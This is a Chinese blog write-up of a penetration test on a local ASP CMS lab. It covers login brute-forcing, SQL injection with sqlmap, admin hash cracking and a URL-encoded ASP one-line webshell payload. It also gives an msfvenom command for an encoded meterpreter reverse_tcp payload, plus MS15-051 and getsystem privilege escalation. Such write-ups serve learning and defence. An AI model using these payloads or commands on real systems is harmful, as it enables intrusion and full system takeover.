一次渗透经验分享

                               **一次渗透经验分享**
 通过在网上看到好多大佬们使用msf工具来进行渗透测试,然后出于学习和探索工具的功能,自己在本地搭建了一个asp的靶场环境进行渗透。效果还是很不错的。
 测试环境:目标机   windows2003 192.168.42.132
                   攻击机   kali 192.168.43.252   win10(我本机) 192.168.43.109
 首先在本机访问192.168.42.132  
 ![这个cms是我从网上下载的](https://img-blog.csdnimg.cn/20190528203524740.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dpbjE3NjQ4OQ==,size_16,color_FFFFFF,t_70)

进去点击会发现前台可以登陆账号

一次渗透经验分享_第1张图片 很惊喜,前台没有设置验证码,我们可以尝试爆破一下,打开burp设置好代理,加上本地字典跑一下试试。
一次渗透经验分享_第2张图片
成功爆破出前台登陆的用户和密码,但是登录上去发现貌似除了随便点点再退出账号并没又什么用。。。
一次渗透经验分享_第3张图片
再测试一下是不是可以注入呢,通过自己测试,找到一个报错的url
http://192.168.42.132/index.asp?a=news_list&id=21'
一次渗透经验分享_第4张图片
这个url地址放sqlmap跑一下,什么都跑不出来。。这里也不行
继续找,发现刚刚用户名加个 ‘ 也能报错
一次渗透经验分享_第5张图片
尝试post注入,把数据包放在sqlmap里跑一下试试


只跑出来一个user表,里面还是空的,所以我思考了一下,目标机用的是ACCESS数据库,因为sqlmap只能通过自己的字典进行枚举,于是我尝试将我自己建的表名输入进去 ,之后就爆出来了字段。
一次渗透经验分享_第6张图片
MD5解密一下 其中一个后台用户名为admin 密码admin888
现在可以登陆后台了,前台点击一次渗透经验分享_第7张图片
输入用户密码成功到后台。在后台尝试了上传文件,发现网站的过滤很严,这条路是行不通了
一次渗透经验分享_第8张图片
于是测试能否在系统参数配置中插入一句话,查看代码我们发现这个文件的代码是经过加密处理的
一次渗透经验分享_第9张图片
通过分析源码,构造出插入的payload为%22%25%3e%3c%25eval+request+(%22pass%22)%25%3e%3c%25%27
利用抓包插入payload

放包,用菜刀连接index.asp(从源码分析得出index.asp包含刚刚修改的asp文件)
一次渗透经验分享_第10张图片
成功getshell ,但是这个权限很低,怎么才能提到系统权限呢,在kali机打开msf
使用venom模块生成test.exe的木马文件
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.43.252 LPORT=8888 -f exe > ./test.exe
一次渗透经验分享_第11张图片
将生成的木马文件和32为的cmd.exe传到目标机的目录下
然后在kali机调用 expolit/multi/handler模块
一次渗透经验分享_第12张图片
设置本地监听的IP 和端口 然后run
一次渗透经验分享_第13张图片
在菜刀中运行test.exe
一次渗透经验分享_第14张图片
kali机获取了一个会话连接

执行命令whoami ,得到的是一个普通权限
一次渗透经验分享_第15张图片
利用exoploit的模块提权,利用溢出漏洞进行提权
use exploit/windows/local/ms15_051_client_copy_image
一次渗透经验分享_第16张图片
返回会话1 利用ps查看新建的2540会话,再利用命令将会话迁移到2540

利用getsystem命令提权,成功执行并建立一条新的会话

再将会话迁移到新的会话,执行shell命令就提权成功啦
一次渗透经验分享_第17张图片
到此处为止,成功get到了操作系统的权限。
成功的道路需要知识和经验一点一点的铺垫,日积月累,才能突破自己

你可能感兴趣的:(一次渗透经验分享)